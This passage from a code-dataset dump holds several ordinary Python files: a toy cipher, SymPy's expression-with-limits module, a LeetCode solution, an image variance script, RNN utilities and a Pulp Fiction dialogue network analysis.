\"\"\n enc_key = \"\"\n enc_string = \"\"\n\n #Enter a message you wish to encypt\n plaintext = input(\"Plaintext Message: \")\n plaintext = plaintext.lower()\n\n #Length of the plain text\n ptxt_length = len(plaintext)\n\n #Enter an ecryption key\n enc_key = input(\"Encryption Key: \")\n plaintext = plaintext.lower()\n\n 
#Expands the key to make it longer than the plaintext\n expanded_key = enc_key\n expanded_key_length = len(expanded_key)\n\n while expanded_key_length < ptxt_length:\n # Adds another repetition of the encryption key\n expanded_key = expanded_key + enc_key\n expanded_key_length = len(expanded_key)\n \n key_position = 0 \n\n for letter in plaintext:\n if letter in alphabet:\n position = alphabet.find(letter)\n # moves along key and finds the characters value\n key_character = expanded_key[key_position]\n key_character_position = alphabet.find(key_character)\n key_position = key_position + 1\n # changes the original of the input string character\n new_position = position + key_character_position\n if new_position > 26:\n new_position = new_position - 26\n new_character = alphabet[new_position]\n enc_string = enc_string + new_character\n else:\n enc_string = enc_string + letter\n return(enc_string)\n\n#Reverse cipher\nreverse = playful_enc()[::-1]\n\n#Reverse cipher into sha3_512 hash\nimport hashlib\n\nresult = hashlib.sha3_512(reverse.encode())\n\nprint (result.hexdigest())\n","repo_name":"Cyberwally/playfulcipher","sub_path":"playful.py","file_name":"playful.py","file_ext":"py","file_size_in_byte":1652,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"18025344920","text":"from sympy.core.add import Add\nfrom sympy.core.containers import Tuple\nfrom sympy.core.expr import Expr\nfrom sympy.core.function import AppliedUndef, UndefinedFunction\nfrom sympy.core.mul import Mul\nfrom sympy.core.relational import Equality, Relational\nfrom sympy.core.singleton import S\nfrom sympy.core.symbol import Symbol, Dummy\nfrom sympy.core.sympify import sympify\nfrom sympy.functions.elementary.piecewise import (piecewise_fold,\n Piecewise)\nfrom sympy.logic.boolalg import BooleanFunction\nfrom sympy.matrices.matrices import MatrixBase\nfrom sympy.sets.sets import Interval, Set\nfrom sympy.sets.fancysets import Range\nfrom sympy.tensor.indexed import Idx\nfrom sympy.utilities import flatten\nfrom sympy.utilities.iterables import sift, is_sequence\nfrom sympy.utilities.exceptions import sympy_deprecation_warning\n\n\ndef _common_new(cls, function, *symbols, discrete, **assumptions):\n \"\"\"Return either a special return value or the tuple,\n (function, limits, orientation). This code is common to\n both ExprWithLimits and AddWithLimits.\"\"\"\n function = sympify(function)\n\n if isinstance(function, Equality):\n # This transforms e.g. Integral(Eq(x, y)) to Eq(Integral(x), Integral(y))\n # but that is only valid for definite integrals.\n limits, orientation = _process_limits(*symbols, discrete=discrete)\n if not (limits and all(len(limit) == 3 for limit in limits)):\n sympy_deprecation_warning(\n \"\"\"\n Creating a indefinite integral with an Eq() argument is\n deprecated.\n\n This is because indefinite integrals do not preserve equality\n due to the arbitrary constants. 
If you want an equality of\n indefinite integrals, use Eq(Integral(a, x), Integral(b, x))\n explicitly.\n \"\"\",\n deprecated_since_version=\"1.6\",\n active_deprecations_target=\"deprecated-indefinite-integral-eq\",\n stacklevel=5,\n )\n\n lhs = function.lhs\n rhs = function.rhs\n return Equality(cls(lhs, *symbols, **assumptions), \\\n cls(rhs, *symbols, **assumptions))\n\n if function is S.NaN:\n return S.NaN\n\n if symbols:\n limits, orientation = _process_limits(*symbols, discrete=discrete)\n for i, li in enumerate(limits):\n if len(li) == 4:\n function = function.subs(li[0], li[-1])\n limits[i] = Tuple(*li[:-1])\n else:\n # symbol not provided -- we can still try to compute a general form\n free = function.free_symbols\n if len(free) != 1:\n raise ValueError(\n \"specify dummy variables for %s\" % function)\n limits, orientation = [Tuple(s) for s in free], 1\n\n # denest any nested calls\n while cls == type(function):\n limits = list(function.limits) + limits\n function = function.function\n\n # Any embedded piecewise functions need to be brought out to the\n # top level. We only fold Piecewise that contain the integration\n # variable.\n reps = {}\n symbols_of_integration = {i[0] for i in limits}\n for p in function.atoms(Piecewise):\n if not p.has(*symbols_of_integration):\n reps[p] = Dummy()\n # mask off those that don't\n function = function.xreplace(reps)\n # do the fold\n function = piecewise_fold(function)\n # remove the masking\n function = function.xreplace({v: k for k, v in reps.items()})\n\n return function, limits, orientation\n\n\ndef _process_limits(*symbols, discrete=None):\n \"\"\"Process the list of symbols and convert them to canonical limits,\n storing them as Tuple(symbol, lower, upper). The orientation of\n the function is also returned when the upper limit is missing\n so (x, 1, None) becomes (x, None, 1) and the orientation is changed.\n In the case that a limit is specified as (symbol, Range), a list of\n length 4 may be returned if a change of variables is needed; the\n expression that should replace the symbol in the expression is\n the fourth element in the list.\n \"\"\"\n limits = []\n orientation = 1\n if discrete is None:\n err_msg = 'discrete must be True or False'\n elif discrete:\n err_msg = 'use Range, not Interval or Relational'\n else:\n err_msg = 'use Interval or Relational, not Range'\n for V in symbols:\n if isinstance(V, (Relational, BooleanFunction)):\n if discrete:\n raise TypeError(err_msg)\n variable = V.atoms(Symbol).pop()\n V = (variable, V.as_set())\n elif isinstance(V, Symbol) or getattr(V, '_diff_wrt', False):\n if isinstance(V, Idx):\n if V.lower is None or V.upper is None:\n limits.append(Tuple(V))\n else:\n limits.append(Tuple(V, V.lower, V.upper))\n else:\n limits.append(Tuple(V))\n continue\n if is_sequence(V) and not isinstance(V, Set):\n if len(V) == 2 and isinstance(V[1], Set):\n V = list(V)\n if isinstance(V[1], Interval): # includes Reals\n if discrete:\n raise TypeError(err_msg)\n V[1:] = V[1].inf, V[1].sup\n elif isinstance(V[1], Range):\n if not discrete:\n raise TypeError(err_msg)\n lo = V[1].inf\n hi = V[1].sup\n dx = abs(V[1].step) # direction doesn't matter\n if dx == 1:\n V[1:] = [lo, hi]\n else:\n if lo is not S.NegativeInfinity:\n V = [V[0]] + [0, (hi - lo)//dx, dx*V[0] + lo]\n else:\n V = [V[0]] + [0, S.Infinity, -dx*V[0] + hi]\n else:\n # more complicated sets would require splitting, e.g.\n # Union(Interval(1, 3), interval(6,10))\n raise NotImplementedError(\n 'expecting Range' if discrete else\n 'Relational or 
single Interval' )\n V = sympify(flatten(V)) # list of sympified elements/None\n if isinstance(V[0], (Symbol, Idx)) or getattr(V[0], '_diff_wrt', False):\n newsymbol = V[0]\n if len(V) == 3:\n # general case\n if V[2] is None and V[1] is not None:\n orientation *= -1\n V = [newsymbol] + [i for i in V[1:] if i is not None]\n\n lenV = len(V)\n if not isinstance(newsymbol, Idx) or lenV == 3:\n if lenV == 4:\n limits.append(Tuple(*V))\n continue\n if lenV == 3:\n if isinstance(newsymbol, Idx):\n # Idx represents an integer which may have\n # specified values it can take on; if it is\n # given such a value, an error is raised here\n # if the summation would try to give it a larger\n # or smaller value than permitted. None and Symbolic\n # values will not raise an error.\n lo, hi = newsymbol.lower, newsymbol.upper\n try:\n if lo is not None and not bool(V[1] >= lo):\n raise ValueError(\"Summation will set Idx value too low.\")\n except TypeError:\n pass\n try:\n if hi is not None and not bool(V[2] <= hi):\n raise ValueError(\"Summation will set Idx value too high.\")\n except TypeError:\n pass\n limits.append(Tuple(*V))\n continue\n if lenV == 1 or (lenV == 2 and V[1] is None):\n limits.append(Tuple(newsymbol))\n continue\n elif lenV == 2:\n limits.append(Tuple(newsymbol, V[1]))\n continue\n\n raise ValueError('Invalid limits given: %s' % str(symbols))\n\n return limits, orientation\n\n\nclass ExprWithLimits(Expr):\n __slots__ = ('is_commutative',)\n\n def __new__(cls, function, *symbols, **assumptions):\n from sympy.concrete.products import Product\n pre = _common_new(cls, function, *symbols,\n discrete=issubclass(cls, Product), **assumptions)\n if isinstance(pre, tuple):\n function, limits, _ = pre\n else:\n return pre\n\n # limits must have upper and lower bounds; the indefinite form\n # is not supported. 
This restriction does not apply to AddWithLimits\n if any(len(l) != 3 or None in l for l in limits):\n raise ValueError('ExprWithLimits requires values for lower and upper bounds.')\n\n obj = Expr.__new__(cls, **assumptions)\n arglist = [function]\n arglist.extend(limits)\n obj._args = tuple(arglist)\n obj.is_commutative = function.is_commutative # limits already checked\n\n return obj\n\n @property\n def function(self):\n \"\"\"Return the function applied across limits.\n\n Examples\n ========\n\n >>> from sympy import Integral\n >>> from sympy.abc import x\n >>> Integral(x**2, (x,)).function\n x**2\n\n See Also\n ========\n\n limits, variables, free_symbols\n \"\"\"\n return self._args[0]\n\n @property\n def kind(self):\n return self.function.kind\n\n @property\n def limits(self):\n \"\"\"Return the limits of expression.\n\n Examples\n ========\n\n >>> from sympy import Integral\n >>> from sympy.abc import x, i\n >>> Integral(x**i, (i, 1, 3)).limits\n ((i, 1, 3),)\n\n See Also\n ========\n\n function, variables, free_symbols\n \"\"\"\n return self._args[1:]\n\n @property\n def variables(self):\n \"\"\"Return a list of the limit variables.\n\n >>> from sympy import Sum\n >>> from sympy.abc import x, i\n >>> Sum(x**i, (i, 1, 3)).variables\n [i]\n\n See Also\n ========\n\n function, limits, free_symbols\n as_dummy : Rename dummy variables\n sympy.integrals.integrals.Integral.transform : Perform mapping on the dummy variable\n \"\"\"\n return [l[0] for l in self.limits]\n\n @property\n def bound_symbols(self):\n \"\"\"Return only variables that are dummy variables.\n\n Examples\n ========\n\n >>> from sympy import Integral\n >>> from sympy.abc import x, i, j, k\n >>> Integral(x**i, (i, 1, 3), (j, 2), k).bound_symbols\n [i, j]\n\n See Also\n ========\n\n function, limits, free_symbols\n as_dummy : Rename dummy variables\n sympy.integrals.integrals.Integral.transform : Perform mapping on the dummy variable\n \"\"\"\n return [l[0] for l in self.limits if len(l) != 1]\n\n @property\n def free_symbols(self):\n \"\"\"\n This method returns the symbols in the object, excluding those\n that take on a specific value (i.e. the dummy symbols).\n\n Examples\n ========\n\n >>> from sympy import Sum\n >>> from sympy.abc import x, y\n >>> Sum(x, (x, y, 1)).free_symbols\n {y}\n \"\"\"\n # don't test for any special values -- nominal free symbols\n # should be returned, e.g. don't return set() if the\n # function is zero -- treat it like an unevaluated expression.\n function, limits = self.function, self.limits\n # mask off non-symbol integration variables that have\n # more than themself as a free symbol\n reps = {i[0]: i[0] if i[0].free_symbols == {i[0]} else Dummy()\n for i in self.limits}\n function = function.xreplace(reps)\n isyms = function.free_symbols\n for xab in limits:\n v = reps[xab[0]]\n if len(xab) == 1:\n isyms.add(v)\n continue\n # take out the target symbol\n if v in isyms:\n isyms.remove(v)\n # add in the new symbols\n for i in xab[1:]:\n isyms.update(i.free_symbols)\n reps = {v: k for k, v in reps.items()}\n return {reps.get(_, _) for _ in isyms}\n\n @property\n def is_number(self):\n \"\"\"Return True if the Sum has no free symbols, else False.\"\"\"\n return not self.free_symbols\n\n def _eval_interval(self, x, a, b):\n limits = [(i if i[0] != x else (x, a, b)) for i in self.limits]\n integrand = self.function\n return self.func(integrand, *limits)\n\n def _eval_subs(self, old, new):\n \"\"\"\n Perform substitutions over non-dummy variables\n of an expression with limits. 
Also, can be used\n to specify point-evaluation of an abstract antiderivative.\n\n Examples\n ========\n\n >>> from sympy import Sum, oo\n >>> from sympy.abc import s, n\n >>> Sum(1/n**s, (n, 1, oo)).subs(s, 2)\n Sum(n**(-2), (n, 1, oo))\n\n >>> from sympy import Integral\n >>> from sympy.abc import x, a\n >>> Integral(a*x**2, x).subs(x, 4)\n Integral(a*x**2, (x, 4))\n\n See Also\n ========\n\n variables : Lists the integration variables\n transform : Perform mapping on the dummy variable for integrals\n change_index : Perform mapping on the sum and product dummy variables\n\n \"\"\"\n func, limits = self.function, list(self.limits)\n\n # If one of the expressions we are replacing is used as a func index\n # one of two things happens.\n # - the old variable first appears as a free variable\n # so we perform all free substitutions before it becomes\n # a func index.\n # - the old variable first appears as a func index, in\n # which case we ignore. See change_index.\n\n # Reorder limits to match standard mathematical practice for scoping\n limits.reverse()\n\n if not isinstance(old, Symbol) or \\\n old.free_symbols.intersection(self.free_symbols):\n sub_into_func = True\n for i, xab in enumerate(limits):\n if 1 == len(xab) and old == xab[0]:\n if new._diff_wrt:\n xab = (new,)\n else:\n xab = (old, old)\n limits[i] = Tuple(xab[0], *[l._subs(old, new) for l in xab[1:]])\n if len(xab[0].free_symbols.intersection(old.free_symbols)) != 0:\n sub_into_func = False\n break\n if isinstance(old, (AppliedUndef, UndefinedFunction)):\n sy2 = set(self.variables).intersection(set(new.atoms(Symbol)))\n sy1 = set(self.variables).intersection(set(old.args))\n if not sy2.issubset(sy1):\n raise ValueError(\n \"substitution cannot create dummy dependencies\")\n sub_into_func = True\n if sub_into_func:\n func = func.subs(old, new)\n else:\n # old is a Symbol and a dummy variable of some limit\n for i, xab in enumerate(limits):\n if len(xab) == 3:\n limits[i] = Tuple(xab[0], *[l._subs(old, new) for l in xab[1:]])\n if old == xab[0]:\n break\n # simplify redundant limits (x, x) to (x, )\n for i, xab in enumerate(limits):\n if len(xab) == 2 and (xab[0] - xab[1]).is_zero:\n limits[i] = Tuple(xab[0], )\n\n # Reorder limits back to representation-form\n limits.reverse()\n\n return self.func(func, *limits)\n\n @property\n def has_finite_limits(self):\n \"\"\"\n Returns True if the limits are known to be finite, either by the\n explicit bounds, assumptions on the bounds, or assumptions on the\n variables. 
False if known to be infinite, based on the bounds.\n None if not enough information is available to determine.\n\n Examples\n ========\n\n >>> from sympy import Sum, Integral, Product, oo, Symbol\n >>> x = Symbol('x')\n >>> Sum(x, (x, 1, 8)).has_finite_limits\n True\n\n >>> Integral(x, (x, 1, oo)).has_finite_limits\n False\n\n >>> M = Symbol('M')\n >>> Sum(x, (x, 1, M)).has_finite_limits\n\n >>> N = Symbol('N', integer=True)\n >>> Product(x, (x, 1, N)).has_finite_limits\n True\n\n See Also\n ========\n\n has_reversed_limits\n\n \"\"\"\n\n ret_None = False\n for lim in self.limits:\n if len(lim) == 3:\n if any(l.is_infinite for l in lim[1:]):\n # Any of the bounds are +/-oo\n return False\n elif any(l.is_infinite is None for l in lim[1:]):\n # Maybe there are assumptions on the variable?\n if lim[0].is_infinite is None:\n ret_None = True\n else:\n if lim[0].is_infinite is None:\n ret_None = True\n\n if ret_None:\n return None\n return True\n\n @property\n def has_reversed_limits(self):\n \"\"\"\n Returns True if the limits are known to be in reversed order, either\n by the explicit bounds, assumptions on the bounds, or assumptions on the\n variables. False if known to be in normal order, based on the bounds.\n None if not enough information is available to determine.\n\n Examples\n ========\n\n >>> from sympy import Sum, Integral, Product, oo, Symbol\n >>> x = Symbol('x')\n >>> Sum(x, (x, 8, 1)).has_reversed_limits\n True\n\n >>> Sum(x, (x, 1, oo)).has_reversed_limits\n False\n\n >>> M = Symbol('M')\n >>> Integral(x, (x, 1, M)).has_reversed_limits\n\n >>> N = Symbol('N', integer=True, positive=True)\n >>> Sum(x, (x, 1, N)).has_reversed_limits\n False\n\n >>> Product(x, (x, 2, N)).has_reversed_limits\n\n >>> Product(x, (x, 2, N)).subs(N, N + 2).has_reversed_limits\n False\n\n See Also\n ========\n\n sympy.concrete.expr_with_intlimits.ExprWithIntLimits.has_empty_sequence\n\n \"\"\"\n ret_None = False\n for lim in self.limits:\n if len(lim) == 3:\n var, a, b = lim\n dif = b - a\n if dif.is_extended_negative:\n return True\n elif dif.is_extended_nonnegative:\n continue\n else:\n ret_None = True\n else:\n return None\n if ret_None:\n return None\n return False\n\n\nclass AddWithLimits(ExprWithLimits):\n r\"\"\"Represents unevaluated oriented additions.\n Parent class for Integral and Sum.\n \"\"\"\n\n __slots__ = ()\n\n def __new__(cls, function, *symbols, **assumptions):\n from sympy.concrete.summations import Sum\n pre = _common_new(cls, function, *symbols,\n discrete=issubclass(cls, Sum), **assumptions)\n if isinstance(pre, tuple):\n function, limits, orientation = pre\n else:\n return pre\n\n obj = Expr.__new__(cls, **assumptions)\n arglist = [orientation*function] # orientation not used in ExprWithLimits\n arglist.extend(limits)\n obj._args = tuple(arglist)\n obj.is_commutative = function.is_commutative # limits already checked\n\n return obj\n\n def _eval_adjoint(self):\n if all(x.is_real for x in flatten(self.limits)):\n return self.func(self.function.adjoint(), *self.limits)\n return None\n\n def _eval_conjugate(self):\n if all(x.is_real for x in flatten(self.limits)):\n return self.func(self.function.conjugate(), *self.limits)\n return None\n\n def _eval_transpose(self):\n if all(x.is_real for x in flatten(self.limits)):\n return self.func(self.function.transpose(), *self.limits)\n return None\n\n def _eval_factor(self, **hints):\n if 1 == len(self.limits):\n summand = self.function.factor(**hints)\n if summand.is_Mul:\n out = sift(summand.args, lambda w: w.is_commutative \\\n and not 
set(self.variables) & w.free_symbols)\n return Mul(*out[True])*self.func(Mul(*out[False]), \\\n *self.limits)\n else:\n summand = self.func(self.function, *self.limits[0:-1]).factor()\n if not summand.has(self.variables[-1]):\n return self.func(1, [self.limits[-1]]).doit()*summand\n elif isinstance(summand, Mul):\n return self.func(summand, self.limits[-1]).factor()\n return self\n\n def _eval_expand_basic(self, **hints):\n summand = self.function.expand(**hints)\n force = hints.get('force', False)\n if (summand.is_Add and (force or summand.is_commutative and\n self.has_finite_limits is not False)):\n return Add(*[self.func(i, *self.limits) for i in summand.args])\n elif isinstance(summand, MatrixBase):\n return summand.applyfunc(lambda x: self.func(x, *self.limits))\n elif summand != self.function:\n return self.func(summand, *self.limits)\n return self\n","repo_name":"sympy/sympy","sub_path":"sympy/concrete/expr_with_limits.py","file_name":"expr_with_limits.py","file_ext":"py","file_size_in_byte":21832,"program_lang":"python","lang":"en","doc_type":"code","stars":11561,"dataset":"github-code","pt":"73"} +{"seq_id":"73766304556","text":"#label: 回溯算法 difficulty: medium\n\nimport itertools\nclass Solution:\n def numTilePossibilities(self, tiles: str) -> int:\n res=0\n n=len(tiles)\n for i in range(1,n+1):\n res+=len(set(itertools.permutations(tiles,i)))\n return res\n\n","repo_name":"Aurora-yuan/Leetcode_Python3","sub_path":"1079 活字印刷/1079 活字印刷.py","file_name":"1079 活字印刷.py","file_ext":"py","file_size_in_byte":274,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"73"} +{"seq_id":"16659634688","text":"# este programa calcula a variancia de uma imagem digital\n# feito por Isaius\n\nimport numpy as np\nimport cv2\n\n# abrindo a imagem 1 em forma de matriz\nimg = cv2.imread('WashingtonDC_02.TIF', 0)\n# img.shape retorna uma tupla com (altura, largura) ou (linhas, colunas)\ndimensoes = img.shape\n# guardando as dimensoes para serem usadas para percorrer a matriz\nlargura = dimensoes[1]\naltura = dimensoes[0]\n# variaveis resultados\nmedia = 0\nsomatorio = 0\n# percorrendo a matriz pixel por pixel e somando o valor de cinza\nfor i in range(altura):\n for k in range(largura):\n somatorio += img[i, k]\n# media da imagem\nmedia = somatorio/img.size\n\nsomatorio = 0\nvariancia = 0\n\nfor i in range(altura):\n for k in range(largura):\n aux = img[i, k] - media\n somatorio += aux*aux\n\nvariancia = somatorio/(img.size-1)\n\nprint(variancia)\n\nprint(np.var(img))","repo_name":"Isaius/PDI","sub_path":"atividade01/variancia.py","file_name":"variancia.py","file_ext":"py","file_size_in_byte":858,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"69911229037","text":"\nimport torch\nimport numpy as np\nimport torch.nn as nn\n\n\ndef feed_forward_rnn(rnn, embedded_sequence_batch, lengths=None, hidden_tuple=None):\n \"\"\"\n Recursive function to encapsulate RNN calls.\n :param rnn:\n :param embedded_sequence_batch:\n :param lengths:\n :param hidden_tuple:\n :return:\n \"\"\"\n if lengths is not None:\n rnn_input, indices_unsort = pack_rnn_input(embedded_sequence_batch, lengths)\n rnn_output, hidden_tuple = rnn(rnn_input, hidden_tuple)\n output = unpack_rnn_output(rnn_output, indices_unsort)\n else:\n output, hidden_tuple = rnn(embedded_sequence_batch, hidden_tuple)\n\n return output, hidden_tuple\n\n\ndef pad_sequence(sequence, batch_first=True):\n\n lengths = []\n for s in sequence:\n 
lengths.append(s.shape[0])\n lengths = np.array(lengths, dtype=np.float32)\n lengths = torch.from_numpy(lengths)\n\n return nn.utils.rnn.pad_sequence(sequence, batch_first=batch_first), lengths\n\ndef pack_rnn_input(embedded_sequence_batch, sequence_lengths):\n '''\n :param embedded_sequence_batch: torch.Tensor(batch_size, seq_len)\n :param sequence_lengths: list(batch_size)\n :return:\n '''\n sequence_lengths = sequence_lengths.cpu().numpy()\n\n sorted_sequence_lengths = np.sort(sequence_lengths)[::-1]\n sorted_sequence_lengths = torch.from_numpy(sorted_sequence_lengths.copy())\n\n idx_sort = np.argsort(-sequence_lengths)\n idx_unsort = np.argsort(idx_sort)\n\n idx_sort = torch.from_numpy(idx_sort)\n idx_unsort = torch.from_numpy(idx_unsort)\n\n if embedded_sequence_batch.is_cuda:\n idx_sort = idx_sort.cuda()\n idx_unsort = idx_unsort.cuda()\n\n embedded_sequence_batch = embedded_sequence_batch.index_select(0, idx_sort)\n\n # # go back to ints as requested by torch (will change in torch 0.4)\n # int_sequence_lengths = [int(elem) for elem in sorted_sequence_lengths.tolist()]\n # Handling padding in Recurrent Networks\n packed_rnn_input = nn.utils.rnn.pack_padded_sequence(embedded_sequence_batch,sorted_sequence_lengths,batch_first=True)\n return packed_rnn_input, idx_unsort\n\ndef unpack_rnn_output(packed_rnn_output, indices):\n '''\n :param packed_rnn_output: torch object\n :param indices: Variable(LongTensor) of indices to sort output\n :return:\n '''\n encoded_sequence_batch, _ = nn.utils.rnn.pad_packed_sequence(packed_rnn_output,batch_first=True)\n encoded_sequence_batch = encoded_sequence_batch.index_select(0, indices)\n\n return encoded_sequence_batch\n\ndef mean_pooling(batch_hidden_states, batch_lengths):\n '''\n :param batch_hidden_states: torch.Tensor(batch_size, seq_len, hidden_size)\n :param batch_lengths: list(batch_size)\n :return:\n '''\n\n batch_lengths = batch_lengths.unsqueeze(1)\n pooled_batch = torch.sum(batch_hidden_states, 1)\n\n pooled_batch = pooled_batch / batch_lengths.expand_as(pooled_batch).float()\n\n return pooled_batch\n\n\ndef max_pooling(batch_hidden_states, batch_lengths):\n '''\n :param batch_hidden_states: torch.Tensor(batch_size, seq_len, hidden_size)\n :return:\n '''\n pooled_batch, _ = torch.max(batch_hidden_states, 1)\n return pooled_batch\n\n\ndef gather_last(batch_hidden_states, batch_lengths, bidirectional=True):\n\n seq_len, batch_size, hidden_x_dirs = batch_hidden_states.size()\n\n if bidirectional:\n assert hidden_x_dirs % 2 == 0\n single_dir_hidden = int(hidden_x_dirs / 2)\n else:\n single_dir_hidden = int(hidden_x_dirs)\n\n batch_lengths = batch_lengths.unsqueeze(1).unsqueeze(1)\n\n fw_batch_lengths = batch_lengths - 1\n fw_batch_lengths = fw_batch_lengths.repeat(1, 1, single_dir_hidden)\n\n if bidirectional:\n bw_batch_lengths = torch.zeros(*fw_batch_lengths.size()).long()\n\n if batch_hidden_states.is_cuda:\n bw_batch_lengths = bw_batch_lengths.cuda()\n\n # we want 2 chunks in the last dimension\n out_fw, out_bw = torch.chunk(batch_hidden_states, 2, 2)\n\n h_t_fw = torch.gather(out_fw, 1, fw_batch_lengths)\n h_t_bw = torch.gather(out_bw, 1, bw_batch_lengths)\n\n # -> (batch_size, hidden_x_dirs)\n last_hidden_out = torch.cat([h_t_fw, h_t_bw], 2).squeeze(1)\n\n else:\n last_hidden_out = \\\n torch.gather(batch_hidden_states, 1, fw_batch_lengths).squeeze(1)\n\n return 
last_hidden_out\n","repo_name":"crodriguezo/TMLGA","sub_path":"utils/rnns.py","file_name":"rnns.py","file_ext":"py","file_size_in_byte":4339,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"73"} +{"seq_id":"26540623382","text":"'''\n---------------- Libraries ----------------------\n'''\n\nimport os\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\n#NLP\nimport spacy\nnlp = spacy.load(\"en_core_web_sm\")\n\n#Edgelist\nfrom itertools import combinations\nfrom collections import Counter\n\n#Network\nimport networkx as nx\nplt.rcParams[\"figure.figsize\"] = (20,20)\n\ndef main():\n '''\n ----------------- Read data ----------------------\n '''\n\n '''\n The first thing we do is read in the csv file with our data. \n The files is located in the data folder.\n '''\n\n #Define data path\n input_file = os.path.join(\"..\", \"data\", \"pulp_fiction_dialogue.csv\")\n\n #Read data as a csv using Pandas\n data = pd.read_csv(input_file)\n\n\n '''\n ----------------- Data wrangling ----------------------\n '''\n\n '''\n The next thing we do is some simple data wrangling. \n We rename the column with the character name to avoid spaces in the name.\n Then we join the two columns with character and line. \n We do this because we want to use network analysis based on node pairs/characters appearing together .\n Therefore we need to have both the person speaking and the person being spoken to in our text.\n '''\n\n #We rename the column to avoid spaces in the name\n data = data.rename(columns = {\"Character (actual)\" : \"Character\"}, inplace = False)\n\n #Join the columns with the character and the line\n data = data.assign(United = data.Character.astype(str) + \": \" + data.Line.astype(str))\n \n '''\n ----------------- Post entities -------------\n '''\n\n '''\n The next step is to transform the text into a doc object using SpaCy.\n We are only interested in the entities with the label PERSON because we want to focus on the characters.\n Then we store the entities in a list.\n '''\n\n #Create empty list where the entities will be storred \n post_entities = []\n\n print(\"Create post entities...\")\n\n #For every line in the column United\n for line in data[\"United\"]:\n # create a temporary list\n tmp_list = []\n # create spacy doc object\n doc = nlp(line)\n # for every named entity in the doc\n for entity in doc.ents:\n # if the entity label is equal to Person(SpaCy)\n if entity.label_ == \"PERSON\":\n # append the entity to the temporary list\n tmp_list.append(entity.text)\n # add tmp_list to post_entities list\n post_entities.append(set(sorted(tmp_list)))\n\n print(\"Post entities are created!\")\n\n\n '''\n ------------------- Edgelist --------------------\n ''' \n\n '''\n The next thing we do is make an edgelist. \n The edge list contains the node pairs that appear together in the text. \n We use Itertools combinations function with 2 as our combination number. \n This means that we look for characters/nodes who perform/appear together in pairs.\n '''\n #Create empty list where the nodes will be storred \n edgelist = []\n\n print(\"Create edgelist...\")\n\n # iterate over every document in our post_entities list\n for doc in post_entities:\n # use combinations to create edgelist. We look at combinations of two nodes\n edges = list(combinations(doc,2))\n #for each combination - i.e. 
each pair of 'nodes'\n for edge in edges:\n # append this to edgelist\n edgelist.append(tuple(sorted(edge)))\n\n print(\"Edgelist is created!\")\n\n #Create empty list where the counted nodes will be storred \n counted_edges = []\n\n print(\"Count node pairs...\")\n\n #Count every node pair in the edgelist\n for pair, weight in Counter(edgelist).items():\n #nodeA is the value on index 0\n nodeA = pair[0]\n #nodeB is the value on index 1\n nodeB = pair[1]\n #Append the nodes and their weight to the counted_edges list\n counted_edges.append((nodeA, nodeB, weight))\n\n #Print the counted edges\n print(f\"There is: {len(counted_edges)} node pairs in the counted edges\")\n\n\n #Create data frame with the colomns: nodeA, nodeB and weight\n edges_df = pd.DataFrame(counted_edges, columns=[\"nodeA\", \"nodeB\", \"weight\"])\n\n #Create data frame with the node pairs with a weight of more than one\n filtered_df = edges_df[edges_df[\"weight\"]>1]\n\n print(f\"{len(filtered_df)} of the node pairs have a weight of more than one\")\n \n '''\n ------------------ Network -------------------\n '''\n '''\n The next step is to create and plot our network model using NetworkX.\n '''\n\n print(\"Create network based on node pair weight...\")\n\n #Create network based on the filtered edges\n network = nx.from_pandas_edgelist(filtered_df, \"nodeA\", \"nodeB\", [\"weight\"])\n\n #Define outpath for the vizualization\n outpath_viz = os.path.join(\"..\",\"output\", \"network_viz.png\")\n\n #Create and draw the vizualization \n viz = nx.nx_agraph.graphviz_layout(network, prog=\"neato\")\n nx.draw(network, viz, with_labels=True, node_size=20, font_size=10)\n\n #Save the vizualization \n plt.savefig(outpath_viz, dpi=300, bbox_inches=\"tight\")\n\n print(\"The network is created and can be found in the output folder!\")\n \n '''\n ------------------ Centrality measures ---------------\n '''\n\n print(\"Find centrality measures...\")\n\n #Find the eigenvector centrality \n ev = nx.eigenvector_centrality(network) \n #Make df with the eigenvector centrality \n ev_df = pd.DataFrame(ev.items(), columns=[\"nodeA\", \"eigenvector\"])\n\n #Find betweenness centrality\n bc = nx.betweenness_centrality(network) \n #Make df with the betweenness centrality\n bc_df = pd.DataFrame(bc.items(), columns=[\"nodeA\", \"betweenness\"]) \n\n #Merge the three data frames into one\n Centrality_measure_df = pd.merge(bc_df, ev_df, how=\"inner\", on=[\"nodeA\"])\n Centrality_measure_df = pd.merge(Centrality_measure_df, filtered_df, how=\"inner\", on=[\"nodeA\"])\n\n #Define outpath for the centrality measure data frame \n outpath_df = os.path.join(\"..\", \"output\", \"Centrality_measure.csv\") \n #Save the merged data frame as a csv in the output folder \n Centrality_measure_df.to_csv(outpath_df)\n \n #Create data frame for the number of spoken lines per character\n spoken_lines = pd.DataFrame(data[\"Character\"].value_counts())\n #Define outpath for the data frame\n lines_out = os.path.join(\"..\", \"output\", \"Spoken_lines.csv\")\n #Save the data frame\n spoken_lines.to_csv(lines_out)\n \n print(\"The centrality measures are located in the output folder!\")\n \n \n#Define behaviour when called from command line\nif __name__ == \"__main__\":\n main()","repo_name":"JohanneBW/cds_language_assignments","sub_path":"Project/src/PulpFiction_network.py","file_name":"PulpFiction_network.py","file_ext":"py","file_size_in_byte":6831,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} 
